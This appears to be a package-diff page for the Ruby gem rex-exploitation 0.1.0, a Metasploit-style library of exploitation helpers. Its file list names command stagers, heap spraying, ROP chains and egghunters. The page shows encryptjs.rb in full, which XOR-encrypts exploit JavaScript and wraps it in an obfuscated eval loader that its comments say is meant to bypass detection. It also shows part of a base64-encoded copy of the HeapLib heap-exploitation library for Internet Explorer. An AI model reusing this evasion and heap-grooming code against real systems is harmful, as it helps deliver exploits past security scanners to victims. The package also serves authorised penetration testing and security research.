rex-exploitation 0.1.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +7 -0
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +1 -0
- data/.gitignore +9 -0
- data/.rspec +2 -0
- data/.travis.yml +5 -0
- data/CODE_OF_CONDUCT.md +74 -0
- data/Gemfile +4 -0
- data/README.md +33 -0
- data/Rakefile +6 -0
- data/bin/console +14 -0
- data/bin/setup +8 -0
- data/data/exploits/cmdstager/debug_asm +91 -0
- data/data/exploits/cmdstager/debug_write +819 -0
- data/data/exploits/cmdstager/vbs_b64 +40 -0
- data/data/exploits/cmdstager/vbs_b64_adodb +50 -0
- data/data/exploits/cmdstager/vbs_b64_noquot +49 -0
- data/data/exploits/cmdstager/vbs_b64_sleep +41 -0
- data/data/js/detect/ie_addons.js +89 -0
- data/data/js/detect/misc_addons.js +157 -0
- data/data/js/detect/os.js +831 -0
- data/data/js/memory/explib2/lib/explib2.js +426 -0
- data/data/js/memory/explib2/payload/drop_exec.js +33 -0
- data/data/js/memory/explib2/payload/exec.js +10 -0
- data/data/js/memory/heap_spray.js +17 -0
- data/data/js/memory/heaplib2.js +192 -0
- data/data/js/memory/mstime_malloc.js +31 -0
- data/data/js/memory/property_spray.js +38 -0
- data/data/js/network/ajax_download.js +18 -0
- data/data/js/network/ajax_post.js +18 -0
- data/data/js/network/xhr_shim.js +15 -0
- data/data/js/utils/base64.js +126 -0
- data/data/ropdb/flash.xml +80 -0
- data/data/ropdb/hxds.xml +66 -0
- data/data/ropdb/java.xml +33 -0
- data/data/ropdb/msvcrt.xml +71 -0
- data/data/ropdb/reader.xml +132 -0
- data/data/ropdb/samba.xml +436 -0
- data/data/ropdb/stagefright.xml +225 -0
- data/lib/rex/exploitation.rb +7 -0
- data/lib/rex/exploitation/cmdstager.rb +11 -0
- data/lib/rex/exploitation/cmdstager/base.rb +189 -0
- data/lib/rex/exploitation/cmdstager/bourne.rb +118 -0
- data/lib/rex/exploitation/cmdstager/certutil.rb +114 -0
- data/lib/rex/exploitation/cmdstager/debug_asm.rb +139 -0
- data/lib/rex/exploitation/cmdstager/debug_write.rb +133 -0
- data/lib/rex/exploitation/cmdstager/echo.rb +166 -0
- data/lib/rex/exploitation/cmdstager/printf.rb +121 -0
- data/lib/rex/exploitation/cmdstager/tftp.rb +70 -0
- data/lib/rex/exploitation/cmdstager/vbs.rb +125 -0
- data/lib/rex/exploitation/egghunter.rb +423 -0
- data/lib/rex/exploitation/encryptjs.rb +79 -0
- data/lib/rex/exploitation/heaplib.js.b64 +331 -0
- data/lib/rex/exploitation/heaplib.rb +107 -0
- data/lib/rex/exploitation/js.rb +6 -0
- data/lib/rex/exploitation/js/detect.rb +70 -0
- data/lib/rex/exploitation/js/memory.rb +80 -0
- data/lib/rex/exploitation/js/network.rb +83 -0
- data/lib/rex/exploitation/js/utils.rb +32 -0
- data/lib/rex/exploitation/jsobfu.rb +17 -0
- data/lib/rex/exploitation/obfuscatejs.rb +336 -0
- data/lib/rex/exploitation/omelet.rb +321 -0
- data/lib/rex/exploitation/opcodedb.rb +819 -0
- data/lib/rex/exploitation/ropdb.rb +190 -0
- data/lib/rex/exploitation/seh.rb +93 -0
- data/lib/rex/exploitation/version.rb +5 -0
- data/rex-exploitation.gemspec +35 -0
- metadata +298 -0
- metadata.gz.sig +0 -0
|
@@ -0,0 +1,79 @@
|
|
|
1
|
+
# -*- coding: binary -*-
|
|
2
|
+
require 'rex/encoder'
|
|
3
|
+
module Rex
|
|
4
|
+
module Exploitation
|
|
5
|
+
|
|
6
|
+
#
|
|
7
|
+
# Encrypts javascript code
|
|
8
|
+
#
|
|
9
|
+
class EncryptJS
|
|
10
|
+
#
|
|
11
|
+
# Encrypts a javascript string.
|
|
12
|
+
#
|
|
13
|
+
# Encrypts a javascript string via XOR using a given key.
|
|
14
|
+
# The key must be passed to the executed javascript
|
|
15
|
+
# so that it can decrypt itself.
|
|
16
|
+
# The provided loader gets the key from
|
|
17
|
+
# "location.search.substring(1)"
|
|
18
|
+
#
|
|
19
|
+
# This should bypass any detection of the file itself
|
|
20
|
+
# as information not part of the file is needed to
|
|
21
|
+
# decrypt the original javascript code.
|
|
22
|
+
#
|
|
23
|
+
# Example:
|
|
24
|
+
# <code>
|
|
25
|
+
# js = <<ENDJS
|
|
26
|
+
# function say_hi() {
|
|
27
|
+
# var foo = "Hello, world";
|
|
28
|
+
# document.writeln(foo);
|
|
29
|
+
# }
|
|
30
|
+
# ENDJS
|
|
31
|
+
# key = 'secret'
|
|
32
|
+
# js_encrypted = EncryptJS.encrypt(js, key)
|
|
33
|
+
# </code>
|
|
34
|
+
#
|
|
35
|
+
# You might use something like this in exploit
|
|
36
|
+
# modules to pass the key to the javascript
|
|
37
|
+
# <code>
|
|
38
|
+
# if (!request.uri.match(/\?\w+/))
|
|
39
|
+
# send_local_redirect(cli, "?#{@key}")
|
|
40
|
+
# return
|
|
41
|
+
# end
|
|
42
|
+
# </code>
|
|
43
|
+
#
|
|
44
|
+
|
|
45
|
+
def self.encrypt(js, key)
|
|
46
|
+
js.gsub!(/[\r\n]/, '')
|
|
47
|
+
|
|
48
|
+
encoded = Rex::Encoding::Xor::Generic.encode(js, key)[0].unpack("H*")[0]
|
|
49
|
+
|
|
50
|
+
# obfuscate the eval call to circumvent generic detection
|
|
51
|
+
eval = 'eval'.split(//).join(Rex::Text.rand_text_alpha(rand(5)).upcase)
|
|
52
|
+
eval_call = 'window["' + eval + '".replace(/[A-Z]/g,"")]'
|
|
53
|
+
|
|
54
|
+
js_loader = Rex::Exploitation::ObfuscateJS.new <<-ENDJS
|
|
55
|
+
var exploit = '#{encoded}';
|
|
56
|
+
var encoded = '';
|
|
57
|
+
for (i = 0;i<exploit.length;i+=2) {
|
|
58
|
+
encoded += String.fromCharCode(parseInt(exploit.substring(i, i+2), 16));
|
|
59
|
+
}
|
|
60
|
+
var pass = location.search.substring(1);
|
|
61
|
+
var decoded = '';
|
|
62
|
+
for (i=0;i<encoded.length;i++) {
|
|
63
|
+
decoded += String.fromCharCode(encoded.charCodeAt(i) ^ pass.charCodeAt(i%pass.length));
|
|
64
|
+
}
|
|
65
|
+
#{eval_call}(decoded);
|
|
66
|
+
ENDJS
|
|
67
|
+
|
|
68
|
+
js_loader.obfuscate(
|
|
69
|
+
'Symbols' => {
|
|
70
|
+
'Variables' => [ 'exploit', 'encoded', 'pass', 'decoded' ],
|
|
71
|
+
},
|
|
72
|
+
'Strings' => false
|
|
73
|
+
)
|
|
74
|
+
end
|
|
75
|
+
|
|
76
|
+
end
|
|
77
|
+
|
|
78
|
+
end
|
|
79
|
+
end
|
|
@@ -0,0 +1,331 @@
|
|
|
1
|
+
Ly8NCi8vICAgSmF2YVNjcmlwdCBIZWFwIEV4cGxvaXRhdGlvbiBsaWJyYXJ5
|
|
2
|
+
DQovLyAgIGJ5IEFsZXhhbmRlciBTb3Rpcm92IDxhc290aXJvdkBkZXRlcm1p
|
|
3
|
+
bmEuY29tPg0KLy8gIA0KLy8gICBWZXJzaW9uIDAuMw0KLy8NCi8vIENvcHly
|
|
4
|
+
aWdodCAoYykgMjAwNywgQWxleGFuZGVyIFNvdGlyb3YNCi8vIEFsbCByaWdo
|
|
5
|
+
dHMgcmVzZXJ2ZWQuDQovLyANCi8vIFRoZSBIZWFwTGliIGxpYnJhcnkgaXMg
|
|
6
|
+
bGljZW5zZWQgdW5kZXIgYSBCU0QgbGljZW5zZSwgdGhlIHRleHQgb2Ygd2hp
|
|
7
|
+
Y2ggZm9sbG93czoNCi8vIA0KLy8gUmVkaXN0cmlidXRpb24gYW5kIHVzZSBp
|
|
8
|
+
biBzb3VyY2UgYW5kIGJpbmFyeSBmb3Jtcywgd2l0aCBvciB3aXRob3V0DQov
|
|
9
|
+
LyBtb2RpZmljYXRpb24sIGFyZSBwZXJtaXR0ZWQgcHJvdmlkZWQgdGhhdCB0
|
|
10
|
+
aGUgZm9sbG93aW5nIGNvbmRpdGlvbnMNCi8vIGFyZSBtZXQ6DQovLyANCi8v
|
|
11
|
+
IDEuIFJlZGlzdHJpYnV0aW9ucyBvZiBzb3VyY2UgY29kZSBtdXN0IHJldGFp
|
|
12
|
+
biB0aGUgYWJvdmUgY29weXJpZ2h0DQovLyAgICBub3RpY2UsIHRoaXMgbGlz
|
|
13
|
+
dCBvZiBjb25kaXRpb25zIGFuZCB0aGUgZm9sbG93aW5nIGRpc2NsYWltZXIu
|
|
14
|
+
DQovLyAyLiBSZWRpc3RyaWJ1dGlvbnMgaW4gYmluYXJ5IGZvcm0gbXVzdCBy
|
|
15
|
+
ZXByb2R1Y2UgdGhlIGFib3ZlIGNvcHlyaWdodA0KLy8gICAgbm90aWNlLCB0
|
|
16
|
+
aGlzIGxpc3Qgb2YgY29uZGl0aW9ucyBhbmQgdGhlIGZvbGxvd2luZyBkaXNj
|
|
17
|
+
bGFpbWVyIGluIHRoZQ0KLy8gICAgZG9jdW1lbnRhdGlvbiBhbmQvb3Igb3Ro
|
|
18
|
+
ZXIgbWF0ZXJpYWxzIHByb3ZpZGVkIHdpdGggdGhlIGRpc3RyaWJ1dGlvbi4N
|
|
19
|
+
Ci8vIDMuIE5laXRoZXIgdGhlIG5hbWUgb2YgQWxleGFuZGVyIFNvdGlyb3Yg
|
|
20
|
+
bm9yIHRoZSBuYW1lIG9mIERldGVybWluYSBJbmMuDQovLyAgICBtYXkgYmUg
|
|
21
|
+
dXNlZCB0byBlbmRvcnNlIG9yIHByb21vdGUgcHJvZHVjdHMgZGVyaXZlZCBm
|
|
22
|
+
cm9tIHRoaXMgc29mdHdhcmUNCi8vICAgIHdpdGhvdXQgc3BlY2lmaWMgcHJp
|
|
23
|
+
b3Igd3JpdHRlbiBwZXJtaXNzaW9uLg0KLy8gDQovLyBUSElTIFNPRlRXQVJF
|
|
24
|
+
IElTIFBST1ZJREVEIEJZIFRIRSBDT1BZUklHSFQgSE9MREVSUyBBTkQgQ09O
|
|
25
|
+
VFJJQlVUT1JTICJBUyBJUyINCi8vIEFORCBBTlkgRVhQUkVTUyBPUiBJTVBM
|
|
26
|
+
SUVEIFdBUlJBTlRJRVMsIElOQ0xVRElORywgQlVUIE5PVCBMSU1JVEVEIFRP
|
|
27
|
+
LCBUSEUNCi8vIElNUExJRUQgV0FSUkFOVElFUyBPRiBNRVJDSEFOVEFCSUxJ
|
|
28
|
+
VFkgQU5EIEZJVE5FU1MgRk9SIEEgUEFSVElDVUxBUiBQVVJQT1NFDQovLyBB
|
|
29
|
+
UkUgRElTQ0xBSU1FRC4gSU4gTk8gRVZFTlQgU0hBTEwgVEhFIENPUFlSSUdI
|
|
30
|
+
VCBPV05FUiBPUiBDT05UUklCVVRPUlMgQkUNCi8vIExJQUJMRSBGT1IgQU5Z
|
|
31
|
+
IERJUkVDVCwgSU5ESVJFQ1QsIElOQ0lERU5UQUwsIFNQRUNJQUwsIEVYRU1Q
|
|
32
|
+
TEFSWSwgT1INCi8vIENPTlNFUVVFTlRJQUwgREFNQUdFUyAoSU5DTFVESU5H
|
|
33
|
+
LCBCVVQgTk9UIExJTUlURUQgVE8sIFBST0NVUkVNRU5UIE9GDQovLyBTVUJT
|
|
34
|
+
VElUVVRFIEdPT0RTIE9SIFNFUlZJQ0VTOyBMT1NTIE9GIFVTRSwgREFUQSwg
|
|
35
|
+
T1IgUFJPRklUUzsgT1IgQlVTSU5FU1MNCi8vIElOVEVSUlVQVElPTikgSE9X
|
|
36
|
+
RVZFUiBDQVVTRUQgQU5EIE9OIEFOWSBUSEVPUlkgT0YgTElBQklMSVRZLCBX
|
|
37
|
+
SEVUSEVSIElODQovLyBDT05UUkFDVCwgU1RSSUNUIExJQUJJTElUWSwgT1Ig
|
|
38
|
+
VE9SVCAoSU5DTFVESU5HIE5FR0xJR0VOQ0UgT1IgT1RIRVJXSVNFKQ0KLy8g
|
|
39
|
+
QVJJU0lORyBJTiBBTlkgV0FZIE9VVCBPRiBUSEUgVVNFIE9GIFRISVMgU09G
|
|
40
|
+
VFdBUkUsIEVWRU4gSUYgQURWSVNFRCBPRiBUSEUNCi8vIFBPU1NJQklMSVRZ
|
|
41
|
+
IE9GIFNVQ0ggREFNQUdFLg0KLy8NCiANCi8vDQovLyBoZWFwTGliIG5hbWVz
|
|
42
|
+
cGFjZQ0KLy8NCg0KZnVuY3Rpb24gaGVhcExpYigpIHsNCn0NCg0KDQovLw0K
|
|
43
|
+
Ly8gaGVhcExpYiBjbGFzcw0KLy8NCg0KLy8gaGVhcExpYi5pZSBjb25zdHJ1
|
|
44
|
+
Y3Rvcg0KLy8NCi8vIENyZWF0ZXMgYSBuZXcgaGVhcExpYiBBUEkgb2JqZWN0
|
|
45
|
+
IGZvciBJbnRlcm5ldCBFeHBsb3Jlci4gVGhlIG1heEFsbG9jDQovLyBhcmd1
|
|
46
|
+
bWVudCBzZXRzIHRoZSBtYXhpbXVtIGJsb2NrIHNpemUgdGhhdCBjYW4gYmUg
|
|
47
|
+
YWxsb2NhdGVkIHVzaW5nIHRoZSBhbGxvYygpDQovLyBmdW5jdGlvbi4NCi8v
|
|
48
|
+
DQovLyBBcmd1bWVudHM6DQovLyAgICBtYXhBbGxvYyAtIG1heGltdW0gYWxs
|
|
49
|
+
b2NhdGlvbiBzaXplIGluIGJ5dGVzIChkZWZhdWx0cyB0byA2NTUzNSkNCi8v
|
|
50
|
+
ICAgIGhlYXBCYXNlIC0gYmFzZSBvZiB0aGUgZGVmYXVsdCBwcm9jZXNzIGhl
|
|
51
|
+
YXAgKGRlZmF1bHRzIHRvIDB4MTUwMDAwKQ0KLy8NCg0KaGVhcExpYi5pZSA9
|
|
52
|
+
IGZ1bmN0aW9uKG1heEFsbG9jLCBoZWFwQmFzZSkgew0KDQogICAgdGhpcy5t
|
|
53
|
+
YXhBbGxvYyA9IChtYXhBbGxvYyA/IG1heEFsbG9jIDogNjU1MzUpOw0KICAg
|
|
54
|
+
IHRoaXMuaGVhcEJhc2UgPSAoaGVhcEJhc2UgPyBoZWFwQmFzZSA6IDB4MTUw
|
|
55
|
+
MDAwKTsNCg0KICAgIC8vIEFsbG9jYXRlIGEgcGFkZGluZyBzdHJpbmcgdGhh
|
|
56
|
+
dCB1c2VzIG1heEFsbG9jIGJ5dGVzDQogICAgdGhpcy5wYWRkaW5nU3RyID0g
|
|
57
|
+
IkFBQUEiOw0KDQogICAgd2hpbGUgKDQgKyB0aGlzLnBhZGRpbmdTdHIubGVu
|
|
58
|
+
Z3RoKjIgKyAyIDwgdGhpcy5tYXhBbGxvYykgew0KICAgICAgICB0aGlzLnBh
|
|
59
|
+
ZGRpbmdTdHIgKz0gdGhpcy5wYWRkaW5nU3RyOw0KICAgIH0NCiAgICANCiAg
|
|
60
|
+
ICAvLyBDcmVhdGUgYW4gYXJyYXkgZm9yIHN0b3JpbmcgcmVmZXJlbmNlcyB0
|
|
61
|
+
byBhbGxvY2F0ZWQgbWVtb3J5DQogICAgdGhpcy5tZW0gPSBuZXcgQXJyYXko
|
|
62
|
+
KTsNCg0KICAgIC8vIENhbGwgZmx1c2hPbGVhdXQzMigpIG9uY2UgdG8gYWxs
|
|
63
|
+
b2NhdGUgdGhlIG1heGltdW0gc2l6ZSBibG9ja3MNCiAgICB0aGlzLmZsdXNo
|
|
64
|
+
T2xlYXV0MzIoKTsNCn0NCg0KDQovLw0KLy8gT3V0cHV0cyBhIGRlYnVnZ2lu
|
|
65
|
+
ZyBtZXNzYWdlIGluIFdpbkRiZy4gVGhlIG1zZyBhcmd1bWVudCBtdXN0IGJl
|
|
66
|
+
IGEgc3RyaW5nDQovLyBsaXRlcmFsLiBVc2luZyBzdHJpbmcgY29uY2F0ZW5h
|
|
67
|
+
dGlvbiB0byBidWlsZCB0aGUgbWVzc2FnZSB3aWxsIHJlc3VsdCBpbiBoZWFw
|
|
68
|
+
DQovLyBhbGxvY2F0aW9ucy4NCi8vDQovLyBBcmd1bWVudHM6DQovLyAgICBt
|
|
69
|
+
c2cgLSBzdHJpbmcgdG8gb3V0cHV0DQovLw0KDQpoZWFwTGliLmllLnByb3Rv
|
|
70
|
+
dHlwZS5kZWJ1ZyA9IGZ1bmN0aW9uKG1zZykgew0KICAgIHZvaWQoTWF0aC5h
|
|
71
|
+
dGFuMigweGJhYmUsIG1zZykpOw0KfQ0KDQoNCi8vDQovLyBFbmFibGVzIG9y
|
|
72
|
+
IGRpc2FibGVzIGxvZ2dpbmcgb2YgaGVhcCBvcGVyYXRpb25zIGluIFdpbkRi
|
|
73
|
+
Zy4NCi8vDQovLyBBcmd1bWVudHM6DQovLyAgICBlbmFibGUgLSBhIGJvb2xl
|
|
74
|
+
YW4gdmFsdWUsIHNldCB0byB0cnVlIHRvIGVuYWJsZSBoZWFwIGxvZ2dpbmcN
|
|
75
|
+
Ci8vDQoNCmhlYXBMaWIuaWUucHJvdG90eXBlLmRlYnVnSGVhcCA9IGZ1bmN0
|
|
76
|
+
aW9uKGVuYWJsZSkgew0KDQogICAgaWYgKGVuYWJsZSA9PSB0cnVlKQ0KICAg
|
|
77
|
+
ICAgICB2b2lkKE1hdGguYXRhbigweGJhYmUpKTsNCiAgICBlbHNlDQogICAg
|
|
78
|
+
ICAgIHZvaWQoTWF0aC5hc2luKDB4YmFiZSkpOw0KfQ0KDQoNCi8vDQovLyBU
|
|
79
|
+
cmlnZ2VycyBhIGJyZWFrcG9pbnQgaW4gdGhlIGRlYnVnZ2VyLg0KLy8NCg0K
|
|
80
|
+
aGVhcExpYi5pZS5wcm90b3R5cGUuZGVidWdCcmVhayA9IGZ1bmN0aW9uKG1z
|
|
81
|
+
Zykgew0KICAgIHZvaWQoTWF0aC5hY29zKDB4YmFiZSkpOw0KfQ0KDQoNCi8v
|
|
82
|
+
DQovLyBSZXR1cm5zIGEgc3RyaW5nIG9mIGEgc3BlY2lmaWVkIGxlbmd0aCwg
|
|
83
|
+
dXAgdG8gdGhlIG1heGltdW0gYWxsb2NhdGlvbiBzaXplDQovLyBzZXQgaW4g
|
|
84
|
+
dGhlIGhlYXBMaWIuaWUgY29uc3RydWN0b3IuIFRoZSBzdHJpbmcgY29udGFp
|
|
85
|
+
bnMgIkEiIGNoYXJhY3RlcnMuDQovLw0KLy8gQXJndW1lbnRzOg0KLy8gICAg
|
|
86
|
+
bGVuIC0gbGVuZ3RoIGluIGNoYXJhY3RlcnMNCi8vDQoNCmhlYXBMaWIuaWUu
|
|
87
|
+
cHJvdG90eXBlLnBhZGRpbmcgPSBmdW5jdGlvbihsZW4pIHsNCiAgICBpZiAo
|
|
88
|
+
bGVuID4gdGhpcy5wYWRkaW5nU3RyLmxlbmd0aCkNCiAgICAgICAgdGhyb3cg
|
|
89
|
+
IlJlcXVlc3RlZCBwYWRkaW5nIHN0cmluZyBsZW5ndGggIiArIGxlbiArICIs
|
|
90
|
+
IG9ubHkgIiArIHRoaXMucGFkZGluZ1N0ci5sZW5ndGggKyAiIGF2YWlsYWJs
|
|
91
|
+
ZSI7DQoNCiAgICByZXR1cm4gdGhpcy5wYWRkaW5nU3RyLnN1YnN0cigwLCBs
|
|
92
|
+
ZW4pOw0KfQ0KDQoNCi8vDQovLyBSZXR1cm5zIGEgbnVtYmVyIHJvdW5kZWQg
|
|
93
|
+
dXAgdG8gYSBzcGVjaWZpZWQgdmFsdWUuDQovLw0KLy8gQXJndW1lbnRzOg0K
|
|
94
|
+
Ly8gICAgbnVtICAgLSBpbnRlZ2VyIHRvIHJvdW5kDQovLyAgICByb3VuZCAt
|
|
95
|
+
IHZhbHVlIHRvIHJvdW5kIHRvDQovLw0KDQpoZWFwTGliLmllLnByb3RvdHlw
|
|
96
|
+
ZS5yb3VuZCA9IGZ1bmN0aW9uKG51bSwgcm91bmQpIHsNCiAgICBpZiAocm91
|
|
97
|
+
bmQgPT0gMCkNCiAgICAgICAgdGhyb3cgIlJvdW5kIGFyZ3VtZW50IGNhbm5v
|
|
98
|
+
dCBiZSAwIjsNCg0KICAgIHJldHVybiBwYXJzZUludCgobnVtICsgKHJvdW5k
|
|
99
|
+
LTEpKSAvIHJvdW5kKSAqIHJvdW5kOw0KfQ0KDQoNCi8vDQovLyBDb252ZXJ0
|
|
100
|
+
cyBhbiBpbnRlZ2VyIHRvIGEgaGV4IHN0cmluZy4gVGhpcyBmdW5jdGlvbiB1
|
|
101
|
+
c2VzIHRoZSBoZWFwLg0KLy8NCi8vIEFyZ3VtZW50czoNCi8vICAgIG51bSAg
|
|
102
|
+
IC0gaW50ZWdlciB0byBjb252ZXJ0DQovLyAgICB3aWR0aCAtIHBhZCB0aGUg
|
|
103
|
+
b3V0cHV0IHdpdGggemVyb3MgdG8gYSBzcGVjaWZpZWQgd2lkdGggKG9wdGlv
|
|
104
|
+
bmFsKQ0KLy8NCg0KaGVhcExpYi5pZS5wcm90b3R5cGUuaGV4ID0gZnVuY3Rp
|
|
105
|
+
b24obnVtLCB3aWR0aCkNCnsNCiAgICB2YXIgZGlnaXRzID0gIjAxMjM0NTY3
|
|
106
|
+
ODlBQkNERUYiOw0KDQogICAgdmFyIGhleCA9IGRpZ2l0cy5zdWJzdHIobnVt
|
|
107
|
+
ICYgMHhGLCAxKTsNCg0KICAgIHdoaWxlIChudW0gPiAweEYpIHsNCiAgICAg
|
|
108
|
+
ICAgbnVtID0gbnVtID4+PiA0Ow0KICAgICAgICBoZXggPSBkaWdpdHMuc3Vi
|
|
109
|
+
c3RyKG51bSAmIDB4RiwgMSkgKyBoZXg7DQogICAgfQ0KDQogICAgdmFyIHdp
|
|
110
|
+
ZHRoID0gKHdpZHRoID8gd2lkdGggOiAwKTsNCg0KICAgIHdoaWxlIChoZXgu
|
|
111
|
+
bGVuZ3RoIDwgd2lkdGgpDQogICAgICAgIGhleCA9ICIwIiArIGhleDsNCg0K
|
|
112
|
+
ICAgIHJldHVybiBoZXg7DQp9DQoNCg0KLy8NCi8vIENvbnZlcnQgYSAzMi1i
|
|
113
|
+
aXQgYWRkcmVzcyB0byBhIDQtYnl0ZSBzdHJpbmcgd2l0aCB0aGUgc2FtZSBy
|
|
114
|
+
ZXByZXNlbnRhdGlvbiBpbg0KLy8gbWVtb3J5LiBUaGlzIGZ1bmN0aW9uIHVz
|
|
115
|
+
ZXMgdGhlIGhlYXAuDQovLw0KLy8gQXJndW1lbnRzOg0KLy8gICAgYWRkciAt
|
|
116
|
+
IGludGVnZXIgcmVwcmVzZW50YXRpb24gb2YgdGhlIGFkZHJlc3MNCi8vDQoN
|
|
117
|
+
CmhlYXBMaWIuaWUucHJvdG90eXBlLmFkZHIgPSBmdW5jdGlvbihhZGRyKSB7
|
|
118
|
+
DQogICAgcmV0dXJuIHVuZXNjYXBlKCIldSIgKyB0aGlzLmhleChhZGRyICYg
|
|
119
|
+
MHhGRkZGLCA0KSArICIldSIgKyB0aGlzLmhleCgoYWRkciA+PiAxNikgJiAw
|
|
120
|
+
eEZGRkYsIDQpKTsNCn0NCg0KDQovLw0KLy8gQWxsb2NhdGVzIGEgYmxvY2sg
|
|
121
|
+
b2YgYSBzcGVjaWZpZWQgc2l6ZSB3aXRoIHRoZSBPTEVBVVQzMiBhbGxvYyBm
|
|
122
|
+
dW5jdGlvbi4NCi8vDQovLyBBcmd1bWVudHM6DQovLyAgICBhcmcgLSBzaXpl
|
|
123
|
+
IG9mIHRoZSBuZXcgYmxvY2sgaW4gYnl0ZXMsIG9yIGEgc3RyaW5nIHRvIHN0
|
|
124
|
+
cmR1cA0KLy8gICAgdGFnIC0gYSB0YWcgaWRlbnRpZnlpbmcgdGhlIG1lbW9y
|
|
125
|
+
eSBibG9jayAob3B0aW9uYWwpDQovLw0KDQpoZWFwTGliLmllLnByb3RvdHlw
|
|
126
|
+
ZS5hbGxvY09sZWF1dDMyID0gZnVuY3Rpb24oYXJnLCB0YWcpIHsNCg0KICAg
|
|
127
|
+
IHZhciBzaXplOw0KDQogICAgLy8gQ2FsY3VsYXRlIHRoZSBhbGxvY2F0aW9u
|
|
128
|
+
IHNpemUNCiAgICBpZiAodHlwZW9mIGFyZyA9PSAic3RyaW5nIiB8fCBhcmcg
|
|
129
|
+
aW5zdGFuY2VvZiBTdHJpbmcpDQogICAgICAgIHNpemUgPSA0ICsgYXJnLmxl
|
|
130
|
+
bmd0aCoyICsgMjsgICAgLy8gbGVuICsgc3RyaW5nIGRhdGEgKyBudWxsIHRl
|
|
131
|
+
cm1pbmF0b3INCiAgICBlbHNlDQogICAgICAgIHNpemUgPSBhcmc7DQoNCiAg
|
|
132
|
+
ICAvLyBNYWtlIHN1cmUgdGhhdCB0aGUgc2l6ZSBpcyB2YWxpZA0KICAgIGlm
|
|
133
|
+
ICgoc2l6ZSAmIDB4ZikgIT0gMCkNCiAgICAgICAgdGhyb3cgIkFsbG9jYXRp
|
|
134
|
+
b24gc2l6ZSAiICsgc2l6ZSArICIgbXVzdCBiZSBhIG11bHRpcGxlIG9mIDE2
|
|
135
|
+
IjsNCg0KICAgIC8vIENyZWF0ZSBhbiBhcnJheSBmb3IgdGhpcyB0YWcgaWYg
|
|
136
|
+
ZG9lc24ndCBhbHJlYWR5IGV4aXN0DQogICAgaWYgKHRoaXMubWVtW3RhZ10g
|
|
137
|
+
PT09IHVuZGVmaW5lZCkNCiAgICAgICAgdGhpcy5tZW1bdGFnXSA9IG5ldyBB
|
|
138
|
+
cnJheSgpOw0KDQogICAgaWYgKHR5cGVvZiBhcmcgPT0gInN0cmluZyIgfHwg
|
|
139
|
+
YXJnIGluc3RhbmNlb2YgU3RyaW5nKSB7DQogICAgICAgIC8vIEFsbG9jYXRl
|
|
140
|
+
IGEgbmV3IGJsb2NrIHdpdGggc3RyZHVwIG9mIHRoZSBzdHJpbmcgYXJndW1l
|
|
141
|
+
bnQNCiAgICAgICAgdGhpcy5tZW1bdGFnXS5wdXNoKGFyZy5zdWJzdHIoMCwg
|
|
142
|
+
YXJnLmxlbmd0aCkpOw0KICAgIH0NCiAgICBlbHNlIHsNCiAgICAgICAgLy8g
|
|
143
|
+
QWxsb2NhdGUgdGhlIGJsb2NrDQogICAgICAgIHRoaXMubWVtW3RhZ10ucHVz
|
|
144
|
+
aCh0aGlzLnBhZGRpbmcoKGFyZy02KS8yKSk7DQogICAgfQ0KfQ0KDQoNCi8v
|
|
145
|
+
DQovLyBGcmVlcyBhbGwgbWVtb3J5IGJsb2NrcyBtYXJrZWQgd2l0aCBhIHNw
|
|
146
|
+
ZWNpZmljIHRhZyB3aXRoIHRoZSBPTEVBVVQzMiBtZW1vcnkNCi8vIGFsbG9j
|
|
147
|
+
YXRvci4NCi8vDQovLyBBcmd1bWVudHM6DQovLyAgICB0YWcgLSBhIHRhZyBp
|
|
148
|
+
ZGVudGlmeWluZyB0aGUgZ3JvdXAgb2YgYmxvY2tzIHRvIGJlIGZyZWVkDQov
|
|
149
|
+
Lw0KDQpoZWFwTGliLmllLnByb3RvdHlwZS5mcmVlT2xlYXV0MzIgPSBmdW5j
|
|
150
|
+
dGlvbih0YWcpIHsNCg0KICAgIGRlbGV0ZSB0aGlzLm1lbVt0YWddOw0KICAg
|
|
151
|
+
IA0KICAgIC8vIFJ1biB0aGUgZ2FyYmFnZSBjb2xsZWN0b3INCiAgICBDb2xs
|
|
152
|
+
ZWN0R2FyYmFnZSgpOw0KfQ0KDQoNCi8vDQovLyBUaGUgSlNjcmlwdCBpbnRl
|
|
153
|
+
cnByZXRlciB1c2VzIHRoZSBPTEVBVVQzMiBtZW1vcnkgYWxsb2NhdG9yIGZv
|
|
154
|
+
ciBhbGwgc3RyaW5nDQovLyBhbGxvY2F0aW9ucy4gVGhpcyBhbGxvY2F0b3Ig
|
|
155
|
+
c3RvcmVzIGZyZWVkIGJsb2NrcyBpbiBhIGNhY2hlIGFuZCByZXVzZXMgdGhl
|
|
156
|
+
bQ0KLy8gZm9yIGxhdGVyIGFsbG9jYXRpb25zLiBUaGUgY2FjaGUgY29uc2lz
|
|
157
|
+
dHMgb2YgNCBiaW5zLCBlYWNoIHN0b3JpbmcgdXAgdG8gNg0KLy8gYmxvY2tz
|
|
158
|
+
LiBFYWNoIGJpbiBob2xkcyBibG9ja3Mgb2YgYSBjZXJ0YWluIHNpemUgcmFu
|
|
159
|
+
Z2U6DQovLw0KLy8gICAgMCAtIDMyDQovLyAgICAzMyAtIDY0DQovLyAgICA2
|
|
160
|
+
NSAtIDI1Ng0KLy8gICAgMjU3IC0gMzI3NjgNCi8vDQovLyBXaGVuIGEgYmxv
|
|
161
|
+
Y2sgaXMgZnJlZWQgYnkgdGhlIE9MRUFVVDMyIGZyZWUgZnVuY3Rpb24sIGl0
|
|
162
|
+
IGlzIHN0b3JlZCBpbiBvbmUgb2YNCi8vIHRoZSBiaW5zLiBJZiB0aGUgYmlu
|
|
163
|
+
IGlzIGZ1bGwsIHRoZSBzbWFsbGVzdCBibG9jayBpbiB0aGUgYmluIGlzIGZy
|
|
164
|
+
ZWVkIHdpdGgNCi8vIFJ0bEZyZWVIZWFwKCkgYW5kIGlzIHJlcGxhY2VkIHdp
|
|
165
|
+
dGggdGhlIG5ldyBibG9jay4gQ2h1bmtzIGxhcmdlciB0aGFuIDMyNzY4DQov
|
|
166
|
+
LyBieXRlcyBhcmUgbm90IGNhY2hlZCBhbmQgYXJlIGZyZWVkIGRpcmVjdGx5
|
|
167
|
+
Lg0KLy8NCi8vIFRvIGZsdXNoIHRoZSBjYWNoZSwgd2UgbmVlZCB0byBmcmVl
|
|
168
|
+
IDYgYmxvY2tzIG9mIHRoZSBtYXhpbXVtIHNpemUgZm9yIGVhY2gNCi8vIGJp
|
|
169
|
+
bi4gVGhlIG1heGltdW0gc2l6ZSBibG9ja3Mgd2lsbCBwdXNoIG91dCBhbGwg
|
|
170
|
+
